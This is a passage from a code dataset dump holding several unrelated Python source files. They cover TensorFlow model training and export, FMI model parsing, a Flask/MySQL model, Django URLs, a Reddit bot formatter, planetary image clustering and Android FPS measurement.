indent=2)\n\n def export(self, ckpt=None):\n \"\"\"\n\n \"\"\"\n\n frozen_name = \"frozen_model\"\n\n tr_ckpt = ckpt or tf.train.latest_checkpoint(self.settings['outputDir'])\n\n logging.info(\"Exporting model using %s\" % tr_ckpt)\n\n tf.reset_default_graph()\n\n evalOutputDir = os.path.join(self.settings['outputDir'], 'eval')\n\n if not os.path.exists(evalOutputDir):\n os.makedirs(evalOutputDir)\n\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer(), name=\"INIT\")\n\n batch_size = 1 # TODO, can this be None or -1 for arbitrary?\n shape = self.dataset.shape(batch_size, flat=True)\n featEval = tf.placeholder(tf.float32, shape, name='INPUT')\n shape = [self.settings['nClasses']]\n labelEval = tf.placeholder(tf.float32, shape, name='INPUT_LABEL')\n eval_ops = self.model_fn(featEval, labelEval, reuse=False, isTraining=False)\n\n assert eval_ops['x'] is featEval\n assert eval_ops['y'] is labelEval\n # -------------------------------------------------------------------------\n # Export model\n # -------------------------------------------------------------------------\n saver = tf.train.Saver()\n modelFile = 'model.pbtxt'\n modelPath = os.path.join(evalOutputDir, modelFile)\n frozenModelPath = os.path.join(evalOutputDir, \"%s.pb\" % frozen_name)\n\n model_ckpt = os.path.join(evalOutputDir, 'model.ckpt')\n with tf.Session() as sess:\n sess.run(init_op)\n\n saver.restore(sess, tr_ckpt)\n\n saver.save(sess, model_ckpt,\n write_meta_graph=False)\n\n tf.train.write_graph(\n sess.graph.as_graph_def(),\n evalOutputDir,\n modelFile,\n as_text=True\n )\n\n export_ops = list(eval_ops.values())\n export_ops.insert(0, init_op)\n print(export_ops)\n export_names = ','.join([op.name.split(\":\")[0] for op in export_ops])\n\n # get the actual file path of the frozen checkpoint\n frozen_ckpt = tf.train.latest_checkpoint(evalOutputDir)\n print(\"-\" * 60)\n print(\"path: %s\" % modelPath)\n print(\"path: %s\" % frozenModelPath)\n print(\"freeze: %s\" % export_names)\n print(\"checkpoint: %s\" % frozen_ckpt)\n print(\"-\" * 60)\n\n path = os.path.join(evalOutputDir,\n \"%s.json\" % frozen_name)\n\n tensors = {name: op.name for name, op in eval_ops.items()}\n ops = {'init': init_op.name, }\n jo = {\n \"checkpoint\": tr_ckpt,\n \"tensors\": tensors,\n \"operations\": ops,\n \"shape\": self.dataset.shape(batch_size, flat=False),\n \"dataset\": self.dataset.exportConfig()\n }\n with open(path, \"w\") as wf:\n json.dump(jo, wf, sort_keys=True, indent=2)\n\n # freeze weights along with the graph, so that it can be used\n # with the C API\n freeze(modelPath, frozenModelPath, frozen_ckpt, export_names)\n\n def onEpochBegin(self, sess, index):\n pass\n\n def onEpochEnd(self, sess, index):\n pass\n\n def onTrainStart(self, sess):\n pass\n\n def onTrainEnd(self, sess):\n pass\n\n def run(self, settings, dataset):\n\n self.makeGraph(settings, dataset)\n\n do_export = True\n\n self.beforeSession()\n with tf.Session() as sess:\n\n self.onTrainStart(sess)\n\n if self.checkpointExists():\n self.restore(sess)\n else:\n self.train(sess)\n do_export = True\n\n self.onTrainEnd(sess)\n\n if do_export:\n self.export()\n\nclass EncoderTrainer(TrainerBase):\n\n def __init__(self, model_fn):\n super(EncoderTrainer, self).__init__()\n\n self.model_fn = model_fn\n\n def makeGraph(self, settings, dataset):\n\n self.settings = settings\n self.dataset = dataset\n\n self.seed = tf.placeholder(tf.int64, shape=tuple(), name=\"seed\")\n\n logging.info(\"create training graph\")\n featTrain, labelTrain, uidTrain = dataset.getTrain(settings['batch_size'], self.seed)\n self.train_ops = self.model_fn(featTrain, labelTrain,\n reuse=False, isTraining=True)\n\n logging.info(\"create dev graph\")\n featDev, labelDev, uidDev = dataset.getDev(settings['batch_size'], self.seed)\n self.dev_ops = self.model_fn(featDev, labelDev,\n reuse=True, isTraining=False)\n\n logging.info(\"create test graph\")\n featTest, labelTest, uidTest = dataset.getTest()\n self.test_ops = self.model_fn(featTest, labelTest,\n reuse=True, isTraining=False)\n\n logging.info(\"create optimizer: adam\")\n self.global_step = tf.Variable(0, name='global_step', trainable=False)\n self.optimizer = tf.train.AdamOptimizer(settings['learning_rate'])\n self.train_op = self.optimizer.minimize(self.train_ops['cost'],\n global_step=self.global_step)\n\n def project(self, sess):\n\n logging.info(\"Creating projection\")\n\n self.settings['projectDir'] = os.path.join(self.settings['outputDir'], 'projector')\n self.settings['projectModel'] = os.path.join(self.settings['projectDir'], 'projector.ckpt')\n\n if not os.path.exists(self.settings['projectDir']):\n os.makedirs(self.settings['projectDir'])\n\n featTest, labelTest, uidTest = self.dataset.getTest()\n\n sess.run(self.dataset.initializer(),\n feed_dict={self.seed: 0})\n\n embed_op = [self.test_ops['z'], labelTest, uidTest]\n embedded_data = []\n embedded_labels = []\n for i in range(self.settings['n_test_samples']):\n try:\n data, label, uid = sess.run(embed_op)\n # some data sets may not define a uid\n if uid.size > 0:\n label = uid[0][0].decode(\"utf-8\")\n else:\n label = self.dataset.oneHot2Label(label[0])\n embedded_data.append(data.reshape([-1, self.settings['dimensions'][-1]]))\n embedded_labels.append(uid)\n except tf.errors.OutOfRangeError:\n break\n\n # generate metadata file\n path_metadata = os.path.abspath(\n os.path.join(self.settings['projectDir'], 'metadata.tsv'))\n\n with open(path_metadata, 'w') as f:\n for label in embedded_labels:\n f.write('%s\\n' % label)\n\n # Input set for Embedded TensorBoard visualization\n # Performed with cpu to conserve memory and processing power\n with tf.device(\"/cpu:0\"):\n\n # shape must be 2d for tensorboard to parse correctly...\n # TODO: set second dimension correctly\n # TODO: i should not need this reshape if the stack is correct\n stack = tf.stack(np.asarray(embedded_data).reshape([-1, self.settings['dimensions'][-1]]),\n axis=0)\n\n print(\"stack shape\", stack.shape)\n\n embedding = tf.Variable(stack, trainable=False,\n name='embedding')\n\n # saver is required to be created heer...\n saver = tf.train.Saver(max_to_keep=None)\n sess.run(tf.global_variables_initializer())\n\n writer = tf.summary.FileWriter(self.settings['projectDir'], sess.graph)\n\n # Add embedding tensorboard visualization. Need tensorflow version\n # >= 0.12.0RC0\n config = projector.ProjectorConfig()\n embed = config.embeddings.add()\n embed.tensor_name = 'embedding:0'\n # todo: this should be an absolute path\n embed.metadata_path = path_metadata\n #embed.sprite.image_path = os.path.join(FLAGS.data_dir + '/mnist_10k_sprite.png')\n\n # Specify the width and height of a single thumbnail.\n #embed.sprite.single_image_dim.extend([28, 28])\n projector.visualize_embeddings(writer, config)\n\n # We save the embeddings for TensorBoard, setting the global step as\n # The number of data examples\n saver.save(sess, os.path.join(self.settings['projectDir'],\n 'a_model.ckpt'),\n global_step=self.settings['n_test_samples'])\n\n def sample(self, sess, uid=0):\n\n logging.info(\"Creating sample image\")\n\n _, width, height = self.dataset.shape(1)\n\n n = 8\n canvas_orig = np.empty((width * n, height * n))\n canvas_recon = np.empty((width * n, height * n))\n\n featTest, labelTest, _ = self.dataset.getTest()\n\n sess.run(self.dataset.initializer(),\n feed_dict={self.seed: 0})\n\n for i in range(n):\n for j in range(n):\n # Encode and decode the digit image\n feat, dec = sess.run([featTest, self.test_ops['y']])\n\n feat_max = feat.max()\n feat_min = feat.min()\n feat = feat.reshape([width, height])\n #feat = AutomaticScale(feat)\n\n dec_max = dec.max()\n dec_min = dec.min()\n dec = dec.reshape([width, height])\n #dec = AutomaticScale(dec)\n\n x1 = i * width\n x2 = (i + 1) * width\n y1 = j * height\n y2 = (j + 1) * height\n # Draw the original digits\n canvas_orig[x1:x2, y1:y2] = feat\n\n # Draw the reconstructed digits\n canvas_recon[x1:x2, y1:y2] = dec\n\n print(feat_min, feat_max, dec_min, dec_max)\n\n print(\"Original Images\")\n plt.figure(figsize=(n, n))\n plt.imshow(canvas_orig, origin=\"upper\", cmap=\"gray\")\n plt.savefig(os.path.join(self.settings['outputDir'], \"img_%02d_original.png\" % uid))\n\n print(\"Reconstructed Images\")\n plt.figure(figsize=(n, n))\n plt.imshow(canvas_recon, origin=\"upper\", cmap=\"gray\")\n plt.savefig(os.path.join(self.settings['outputDir'], \"img_%02d_reconstructed.png\" % uid))\n\n def onEpochEnd(self, sess, index):\n self.sample(sess, index)\n\n def onTrainEnd(self, sess):\n self.project(sess)\n\nclass ClassifierTrainer(TrainerBase):\n\n def __init__(self, model_fn):\n super(ClassifierTrainer, self).__init__()\n\n self.model_fn = model_fn\n\n def makeGraph(self, settings, dataset):\n\n self.settings = settings\n self.dataset = dataset\n\n self.seed = tf.placeholder(tf.int64, shape=tuple(), name=\"seed\")\n\n logging.info(\"create training graph\")\n featTrain, labelTrain, uidTrain = dataset.getTrain(settings['batch_size'], self.seed)\n self.train_ops = self.model_fn(featTrain, labelTrain,\n reuse=False, isTraining=True)\n\n logging.info(\"create dev graph\")\n featDev, labelDev, uidDev = dataset.getDev(settings['batch_size'], self.seed)\n self.dev_ops = self.model_fn(featDev, labelDev,\n reuse=True, isTraining=False)\n\n metrics_file = os.path.join(settings['outputDir'], \"metrics.txt\")\n self.dev_metrics = ClassificationMetricsCalculator(\n metrics_file, settings['nClasses'],\n dataset.iterDev.initializer, self.dev_ops['logits'],\n labelDev, seed=self.seed)\n\n logging.info(\"create test graph\")\n featTest, labelTest, uidTest = dataset.getTest()\n self.test_ops = self.model_fn(featTest, labelTest,\n reuse=True, isTraining=False)\n\n self.test_metrics = ClassificationMetricsCalculator(\n metrics_file, settings['nClasses'],\n dataset.iterTest.initializer, self.test_ops['logits'],\n labelTest)\n\n logging.info(\"create optimizer: adam\")\n self.global_step = tf.Variable(0, name='global_step', trainable=False)\n self.optimizer = tf.train.AdamOptimizer(settings['learning_rate'])\n self.train_op = self.optimizer.minimize(self.train_ops['cost'],\n global_step=self.global_step)\n\n def onEpochEnd(self, sess, index):\n # self.dev_metrics.run(sess)\n pass\n\n def onTrainEnd(self, sess):\n # self.test_metrics.run(sess)\n pass\n\ndef run_experiment(settings, dataset, Trainer, model, keys):\n\n settings['nClasses'] = len(settings['classes'])\n settings['checkpointFile'] = os.path.join(settings['outputDir'],\n 'model.ckpt')\n\n _, settings['nFeatures'], settings['nSlices'] = dataset.shape(None,\n flat=False)\n\n if os.path.exists(settings['outputDir']):\n if input(\"delete experiment? (y/N): \").lower().startswith(\"y\"):\n shutil.rmtree(settings['outputDir'])\n\n cfg = {k: settings[k] for k in keys}\n model_fn = model(**cfg)\n trainer = Trainer(model_fn)\n trainer.run(settings, dataset)\n\ndef expr_audio_classification():\n\n logging.basicConfig(level=logging.INFO)\n\n cfg = AutoEncoderConfig()\n cfg.load(\"./config/audio_10way.cfg\")\n\n settings = {\n \"dataDir\": os.path.abspath(\"./data\"),\n \"outputDir\": os.path.abspath(\"./build/experiment\"),\n \"modelFile\": \"model.pb\",\n \"classes\": cfg.getGenres(),\n \"learning_rate\": 0.001,\n \"nEpochs\": 1,\n \"batch_size\": 50,\n \"max_steps\": 20,\n \"n_test_samples\": 5000,\n }\n\n dataset = AudioDataset(cfg)\n\n model = cnn\n\n if model is lstm2:\n keys = ['nClasses', 'batch_size', 'nFeatures', 'nSlices']\n elif model is cnn:\n keys = ['batch_size', 'nFeatures', 'nSlices']\n\n run_experiment(settings, dataset, ClassifierTrainer, model, keys)\n\ndef expr_mnist_classification():\n\n settings = {\n \"dataDir\": os.path.abspath(\"./build/data\"),\n \"outputDir\": os.path.abspath(\"./build/experiment\"),\n \"modelFile\": \"model.pb\",\n \"classes\": list(range(10)), # [4,9],\n \"learning_rate\": 0.001,\n \"nEpochs\": 1,\n \"batch_size\": 100,\n \"max_steps\": 50,\n \"n_test_samples\": 2500,\n }\n\n dataset = MnistDataset(settings['dataDir'], settings['classes'])\n\n #keys = ['nClasses', 'nFeatures']\n keys = ['batch_size', 'nFeatures', 'nSlices']\n run_experiment(settings, dataset, ClassifierTrainer, cnn, keys)\n\ndef expr_mnist_encoder():\n\n settings = {\n \"dataDir\": os.path.abspath(\"./build/data\"),\n \"outputDir\": os.path.abspath(\"./build/experiment\"),\n \"modelFile\": \"model.pb\",\n \"classes\": list(range(10)), # [4,9],\n \"learning_rate\": 0.01,\n \"nEpochs\": 1,\n \"batch_size\": 100,\n \"max_steps\": 0,\n \"n_test_samples\": 5000,\n }\n\n dataset = MnistDataset(settings['dataDir'], settings['classes'])\n\n _, nFeatures = dataset.shape(None, flat=True)\n settings['dimensions'] = [nFeatures, 256, 128]\n keys = ['dimensions']\n run_experiment(settings, dataset, EncoderTrainer, autoencoder, keys)\n\ndef main():\n # arguments may be: init clean build export\n # maybe this *should* be called from an experiment directory?\n expr_audio_classification()\n\nif __name__ == '__main__':\n main()","sub_path":"mlf/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":25795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"301621400","text":"from lxml import etree\r\nimport zipfile\r\nimport os\r\n\r\nclass ModelDescription(object):\r\n\r\n def __init__(self):\r\n self.guid = None\r\n self.fmiVersion = None\r\n self.modelName = None\r\n self.description = None\r\n self.generationTool = None\r\n self.generationDateAndTime = None\r\n self.variableNamingConvention = None\r\n self.numberOfContinuousStates = None\r\n self.numberOfEventIndicators = None\r\n\r\n self.defaultExperiment = None\r\n\r\n self.coSimulation = None\r\n self.modelExchange = None\r\n\r\n self.modelVariables = []\r\n\r\n\r\nclass DefaultExperiment(object):\r\n\r\n def __init__(self):\r\n self.startTime = None\r\n self.stopTime = None\r\n self.tolerance = None\r\n\r\n\r\nclass CoSimulation(object):\r\n\r\n def __init__(self):\r\n self.modelIdentifier = None\r\n\r\n\r\nclass ModelExchange(object):\r\n\r\n def __init__(self):\r\n self.modelIdentifier = None\r\n\r\n\r\nclass ScalarVariable(object):\r\n\r\n def __init__(self, name, valueReference):\r\n self.name = name\r\n self.valueReference = valueReference\r\n self.description = None\r\n self.type = None\r\n self.start = None\r\n self.causality = None\r\n self.variability = None\r\n\r\n def __repr__(self):\r\n return '%s \"%s\"' % (self.type, self.name)\r\n\r\n\r\ndef read_model_description(filename, validate=True):\r\n\r\n with zipfile.ZipFile(filename, 'r') as zf:\r\n xml = zf.open('modelDescription.xml')\r\n tree = etree.parse(xml)\r\n\r\n root = tree.getroot()\r\n\r\n fmiVersion = root.get('fmiVersion')\r\n\r\n if not fmiVersion in ['1.0', '2.0']:\r\n raise Exception(\"Unsupported FMI version: %s\" % fmiVersion)\r\n\r\n if validate:\r\n\r\n module_dir, _ = os.path.split(__file__)\r\n\r\n if fmiVersion == '1.0':\r\n schema = etree.XMLSchema(file=os.path.join(module_dir, 'schema', 'fmi1', 'fmiModelDescription.xsd'))\r\n else:\r\n schema = etree.XMLSchema(file=os.path.join(module_dir, 'schema', 'fmi2', 'fmi2ModelDescription.xsd'))\r\n\r\n if not schema.validate(root):\r\n message = \"Failed to validate modelDescription.xml:\"\r\n for entry in schema.error_log:\r\n message += \"\\n%s (line %d, column %d): %s\" % (entry.level_name, entry.line, entry.column, entry.message)\r\n raise Exception(message)\r\n\r\n modelDescription = ModelDescription()\r\n modelDescription.fmiVersion = fmiVersion\r\n modelDescription.guid = root.get('guid')\r\n modelDescription.modelName = root.get('modelName')\r\n modelDescription.description = root.get('description')\r\n modelDescription.generationTool = root.get('generationTool')\r\n modelDescription.generationDateAndTime = root.get('generationDateAndTime')\r\n modelDescription.variableNamingConvention = root.get('variableNamingConvention')\r\n\r\n if root.get('numberOfEventIndicators') is not None:\r\n modelDescription.numberOfEventIndicators = int(root.get('numberOfEventIndicators'))\r\n\r\n if modelDescription.fmiVersion == '1.0':\r\n modelDescription.numberOfContinuousStates = int(root.get('numberOfContinuousStates'))\r\n else:\r\n modelDescription.numberOfContinuousStates = len(root.findall('ModelStructure/Derivatives/Unknown'))\r\n\r\n defaultExperiment = root.find('DefaultExperiment')\r\n\r\n if defaultExperiment is not None:\r\n\r\n modelDescription.defaultExperiment = DefaultExperiment()\r\n\r\n startTime = defaultExperiment.get('startTime')\r\n if startTime is not None:\r\n modelDescription.defaultExperiment.startTime = float(startTime)\r\n\r\n stopTime = defaultExperiment.get('stopTime')\r\n if stopTime is not None:\r\n modelDescription.defaultExperiment.stopTime = float(stopTime)\r\n\r\n tolerance = defaultExperiment.get('tolerance')\r\n if tolerance is not None:\r\n modelDescription.defaultExperiment.tolerance = float(tolerance)\r\n\r\n if modelDescription.fmiVersion == \"1.0\":\r\n\r\n modelIdentifier = root.get('modelIdentifier')\r\n\r\n if root.find('Implementation') is not None:\r\n modelDescription.coSimulation = CoSimulation()\r\n modelDescription.coSimulation.modelIdentifier = modelIdentifier\r\n else:\r\n modelDescription.modelExchange = ModelExchange()\r\n modelDescription.modelExchange.modelIdentifier = modelIdentifier\r\n\r\n else:\r\n\r\n me = root.find('ModelExchange')\r\n\r\n if me is not None:\r\n modelDescription.modelExchange = ModelExchange()\r\n modelDescription.modelExchange.modelIdentifier = me.get('modelIdentifier')\r\n\r\n cs = root.find('CoSimulation')\r\n\r\n if cs is not None:\r\n modelDescription.coSimulation = CoSimulation()\r\n modelDescription.coSimulation.modelIdentifier = cs.get('modelIdentifier')\r\n\r\n\r\n modelVariables = root.find('ModelVariables')\r\n\r\n for variable in modelVariables:\r\n\r\n if variable.get(\"name\") is None:\r\n continue\r\n\r\n sv = ScalarVariable(name=variable.get('name'), valueReference=int(variable.get('valueReference')))\r\n sv.description = variable.get('description')\r\n sv.start = variable.get('start')\r\n sv.causality = variable.get('causality')\r\n\r\n value = next(variable.iterchildren())\r\n sv.type = value.tag\r\n start = value.get('start')\r\n\r\n if start is not None:\r\n if sv.type == 'Real':\r\n sv.start = float(start)\r\n elif sv.type == 'Integer':\r\n sv.start = int(start)\r\n elif sv.type == 'Boolean':\r\n sv.start = start == 'true'\r\n else:\r\n sv.start = start\r\n\r\n modelDescription.modelVariables.append(sv)\r\n\r\n\r\n return modelDescription\r\n","sub_path":"fmpy/model_description.py","file_name":"model_description.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"570906490","text":"from scipy.misc import imread, imsave\n\ndef xor_img(img1, img2):\n out_img = img1\n for line in xrange(len(img1)):\n for pixel in xrange(len(img1[line])):\n for color in xrange(3):\n out_img = (int(img1[line][pixel][color]) ^ int(img2[line][pixel][color])) % 256\n\n return out_img\n\nimg1 = imread(\"img.jpg\")\nimg2 = imread(\"new_img.jpg\")\nnew_img = xor_img(img1, img2)\nimsave(\"fuckthis.jpg\", new_img)","sub_path":"Functions/xor_img.py","file_name":"xor_img.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"604355590","text":"from django.conf.urls import patterns, include, url\r\n# from views import Index\r\nfrom .views import main, signup, signin, logout\r\n\r\nurlpatterns = patterns('',\r\n url(r'^$', main, name=\"index\"),\r\n url(r'^signup$', signup, name=\"signup\"),\r\n url(r'^signin$', signin, name=\"signin\"),\r\n url(r'^logout$', logout, name=\"logout\"),\r\n)\r\n","sub_path":"LoginPrueba/apps/login_start/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"216635001","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom .ninjas import Ninjas\n\n\nclass Dojos:\n def __init__( self , data ):\n self.id = data['id']\n self.name = data['name']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.ninjas = []\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM dojos;\"\n results = connectToMySQL('dojos_and_ninjas_schema').query_db(query)\n dojos = []\n for dojo in results:\n dojos.append (cls(dojo) )\n return dojos\n\n @classmethod\n def add_dojo(cls, data):\n query = \"INSERT INTO dojos (name, created_at, updated_at) VALUES (%(name)s, NOW(), NOW() )\"\n connectToMySQL('dojos_and_ninjas_schema').query_db(query, data)\n\n @classmethod\n def single_dojo(cls, data):\n query = \"SELECT * FROM dojos LEFT JOIN ninjas ON dojos.id = ninjas.dojo_id WHERE dojo_id = %(dojo_id)s ;\"\n results = connectToMySQL('dojos_and_ninjas_schema').query_db(query, data)\n print (results)\n dojo = cls(results[-1])\n for row in results:\n ninja = {\n 'id' :row['id'],\n 'first_name' :row['first_name'],\n 'last_name' :row ['last_name'],\n 'age' :row ['age'],\n 'created_at' :row['ninjas.created_at'],\n 'updated_at' :row['ninjas.updated_at']\n }\n dojo.ninjas.append(Ninjas(ninja))\n return dojo\n\n \n\n\n","sub_path":"flask_mysql/crud/dojos_and_ninjas_crud_mod/flask_app/models/dojos.py","file_name":"dojos.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"387474872","text":"from unittest import TestCase\n\nfrom gasopt import datamgr, modelsmgr\nfrom gasopt.data_load import furn_optimization_data_process\nfrom gasopt.furnace_interface import furnace_optimization\n\n\nclass TestOptimization(TestCase):\n def __init__(self, *args, **kwargs):\n super(TestOptimization, self).__init__(*args, **kwargs)\n\n def test_prediction(self):\n # Открыть dataframe с историческими данными\n G = furn_optimization_data_process('../../examples/test-slab-input-furn1.csv')\n\n # Получить рекомендованные настройки газа для зон печи 1 для каждого сляба\n F = furnace_optimization(G, furn_id=1)\n\n print(F)\n print(F.info())\n\n self.assertEqual(len(F), 10, \"Оптимизация не сработала\")\n\n F.to_csv('../../examples/REPORTS/optimization_report.csv', ';')\n print(\"Составление отчета оптимизации\")\n\n","sub_path":"gasopt/tests/test_optimization.py","file_name":"test_optimization.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"478439728","text":"SEARCH_RESULT_FORMAT = ('{title} | {author} | {last_updated} '\n '| {downloads:,d} | {versions}')\nCOMMENT_FORMAT = '''###LinkMod:\n\nTitle | Author | Last updated | Downloads | Versions\n:---|:---|:---|:---|:---\n{0}\n\n*****\n\n^Bleep ^bloop, ^I'm ^a ^bot ^that ^links ^Factorio ^mods. ^| \\\n^Usage: ^(`linkmods: Squeak Through`) ^| \\\n^[GitHub](https://github.com/Sparta142/factorio-mod-portal-bot)\n'''\n\n# Markdown formatting characters to escape in hyperlinks, etc\nESCAPED_CHARACTERS = '\\\\`*_{}[]()#+-.!'\n\n\ndef escape(s):\n \"\"\"\n Backslash-escape most Markdown formatting characters\n in a given string.\n\n :param s: the Markdown string to escape\n :return: the escaped string\n \"\"\"\n return ''.join('\\\\' + ch if ch in ESCAPED_CHARACTERS else ch for ch in s)\n\n\ndef hyperlink(text, url):\n \"\"\"\n Format a hyperlink with the specified text,\n escaping any problem characters as required.\n\n :param text: the text that should appear in place of the URL\n :param url: the url to link to\n :return: the Markdown-formatted link\n \"\"\"\n return '[{}]({})'.format(escape(text), escape(url))\n\n\ndef format_search_result(result):\n \"\"\"\n Format a single SearchResult in Markdown.\n\n :param result: the search result to format\n :return: the formatted result\n \"\"\"\n return SEARCH_RESULT_FORMAT.format(\n title=hyperlink(result.title, result.link),\n author=hyperlink(result.author, result.author_link),\n downloads=result.downloads,\n last_updated=result.last_updated,\n versions=result.versions\n )\n\n\ndef format_comment(search_results):\n \"\"\"\n Format a list of SearchResults in Markdown as a Reddit comment.\n\n :param search_results: the search results to format with\n :return: the formatted comment\n \"\"\"\n results_str = '\\n'.join(format_search_result(r) for r in search_results)\n return COMMENT_FORMAT.format(results_str)\n","sub_path":"bot/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"389200688","text":"\"\"\"This script requires to launch a local ipcontroller. If you execute this\nlocally, do it with `ipcluster start`.\n\"\"\"\nfrom IPython.parallel import Client\nfrom IPython.parallel.util import interactive\nimport argparse\nfrom .p4io import get_image_names_from_db\nimport logging\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\n\n@interactive\ndef do_clustering(p4img, kind='fans'):\n from planet4 import clustering\n import pandas as pd\n\n reduced = clustering.perform_dbscan(p4img, kind)\n if reduced is None:\n return None\n series = [cluster.data for cluster in reduced]\n n_members = [cluster.n_members for cluster in reduced]\n n_rejected = [cluster.n_rejected for cluster in reduced]\n df = pd.DataFrame(series)\n df['image_id'] = p4img.imgid\n df['n_members'] = n_members\n df['n_rejected'] = n_rejected\n return df\n\n\n@interactive\ndef process_image_name(image_name):\n from os.path import join as pjoin\n import os\n import pandas as pd\n from planet4 import markings\n HOME = os.environ['HOME']\n\n dirname = pjoin(HOME, 'data/planet4/catalog_2_and_3')\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n blotchfname = pjoin(dirname, image_name + '_reduced_blotches.hdf')\n fanfname = pjoin(dirname, image_name + '_reduced_fans.hdf')\n if os.path.exists(blotchfname) and\\\n os.path.exists(fanfname):\n return image_name + ' already done.'\n data = pd.read_hdf(dbfile, 'df', where=\"image_name=\" + image_name)\n img_ids = data.image_id.unique()\n blotches = []\n fans = []\n for img_id in img_ids:\n p4img = markings.ImageID(img_id)\n blotches.append(do_clustering(p4img, 'blotches'))\n fans.append(do_clustering(p4img, 'fans'))\n blotches = pd.concat(blotches, ignore_index=True)\n blotches.to_hdf(blotchfname, 'df')\n fans = pd.concat(fans, ignore_index=True)\n fans.to_hdf(fanfname, 'df')\n return image_name\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('db_fname',\n help=\"Provide the filename of the HDF database \"\n \"file here.\")\n args = parser.parse_args()\n\n image_names = get_image_names_from_db(args.db_fname)\n logging.info('Found {} image_names'.format(len(image_names)))\n\n c = Client()\n dview = c.direct_view()\n lbview = c.load_balanced_view()\n\n dview.push({'do_clustering': do_clustering,\n 'dbfile': args.db_fname})\n results = lbview.map_async(process_image_name, image_names)\n import time\n import sys\n import os\n dirname = os.path.join(os.environ['HOME'], 'data/planet4/catalog_2_and_3')\n while not results.ready():\n print(\"{:.1f} %\".format(100 * results.progress / len(image_names)))\n sys.stdout.flush()\n time.sleep(10)\n for res in results.result:\n print(res)\n logging.info('Catalog production done. Results in {}.'.format(dirname))\n","sub_path":"planet4/catalog_production.py","file_name":"catalog_production.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"165718790","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# @author : majunfeng\n# @date : 2021/1/27 17:25\n# @desc : 测试获取 Android 应用的卡顿率指标和FPS值\n\nimport subprocess\nimport time\nfrom pprint import pprint\n\nPACKAGE_NAME = 'com.sohu.inputmethod.sogou.xiaomi'\n\n\nclass FPS(object):\n def __init__(self, device_id=None):\n self.device_id = device_id\n self.cmd = f'adb shell dumpsys gfxinfo {PACKAGE_NAME}'\n if self.device_id:\n self.cmd = f'adb -s {self.device_id} shell dumpsys gfxinfo {PACKAGE_NAME}'\n self.result = None\n\n def set_deviceid(self, device_id):\n self.device_id = device_id\n\n def calculate(self, frames):\n \"\"\"\n 计算当前view 的同步帧率和卡顿率, 每超过16.67ms认为卡顿一次,且每超过一个16.67ms,则有一个垂直同步信号,意味着丢失了一帧\n :param frames: 当前view的数据帧集合,每帧包含draw, prepare, process, execute 四个阶段耗时时间\n :return: 当前fps和卡顿率\n \"\"\"\n if not frames or not isinstance(frames, list):\n return {}\n jank_times = 0\n vsync_times = 0\n for frame in frames:\n frame = frame.strip()\n draw, prepare, process, execute = frame.strip().split('\\t')\n once_time = float(draw) + float(prepare) + float(process) + float(execute)\n if once_time > 16.67:\n jank_times += 1\n # 获取垂直同步信号发生的次数,若一次信号发生时,未绘制完成一帧,则画面会展示旧的帧,也意味着丢失了一帧\n if once_time % 16.67 == 0:\n vsync_times += int(once_time / 16.67) - 1\n else:\n vsync_times += once_time // 16.67\n # 理论总帧数 = 实际帧数 + 执行时间//16.67\n fps = len(frames) / (len(frames) + vsync_times) * 60\n lost_frame_rate = float(jank_times / len(frames))\n return {\n \"fps\": round(fps, 2),\n \"lost_frame_rate\": str(round(lost_frame_rate * 100, 2)) + '%'\n }\n\n def _parse_stdout(self, content):\n \"\"\"\n 临时使用输出结果”暴力“解析\n :param content:\n :return:\n \"\"\"\n start_flag = 'Profile data in ms:'\n end_flag = 'View hierarchy'\n index = content.find(start_flag) + len(start_flag) + 1\n end = content.find(end_flag)\n views_data = content[index: end].strip()\n result = {}\n for view_data in views_data.split('\\r\\n\\r\\n'):\n frames = view_data.split('\\r\\n')\n head = frames[0].strip()\n key = None\n if ':' in head:\n key = head.split(':')[0]\n elif '/' in head:\n key = head.split('/')[0]\n else:\n key = 'unknown'\n result[key] = self.calculate(frames[2:])\n return result\n\n def export(self, content, filename=None):\n if filename is None:\n filename = f'{time.time()}.txt'\n with open(filename, 'a+') as fp:\n fp.write(content)\n\n def _collect_once(self, export=False):\n gfx = subprocess.Popen(self.cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _out = gfx.stdout.read().decode('utf-8')\n if export:\n self.export(_out)\n return self._parse_stdout(_out)\n\n def collect_once(self):\n res = self._collect_once(True)\n self.result = res\n\n def collect_long(self, later_time):\n \"\"\"\n 连续执行一估时间,每秒采集一次数据结果,并返回结果列表\n :param later_time: 设置执行时间,单位s\n :return:\n \"\"\"\n self.result = []\n for i in range(later_time):\n time.sleep(1)\n self.result.append(self._collect_once())\n\n def report(self):\n pprint(self.result)\n return self.result\n\n\nif __name__ == '__main__':\n tester = FPS()\n tester.collect_once()\n # tester.collect_long(20)\n tester.report()\n","sub_path":"android/FPSAnalysis.py","file_name":"FPSAnalysis.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} 